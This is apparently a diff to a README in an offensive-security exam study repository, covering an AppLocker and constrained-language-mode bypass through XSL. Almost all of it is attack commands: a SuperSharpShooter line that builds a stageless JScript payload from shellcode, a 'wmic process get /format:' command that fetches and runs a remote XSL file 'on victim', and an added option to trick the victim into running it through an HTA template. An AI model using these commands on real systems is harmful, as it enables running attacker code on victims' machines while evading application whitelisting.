Extravenger/OSEPlayground/03 - CLM & Applocker Bypass/XSL/README.md

 `python3 SuperSharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile shell.txt --output test`

-Embed the JS content to the XSL template, and on victim, run: `wmic process get /format:"http://192.168.0.1/test.xsl"`
+Option one: Embed the JS content to the XSL template, and on victim, run: `wmic process get /format:"http://192.168.0.1/test.xsl"`
+Option two: use the HTA template to trick the victim to execute the XSL payload.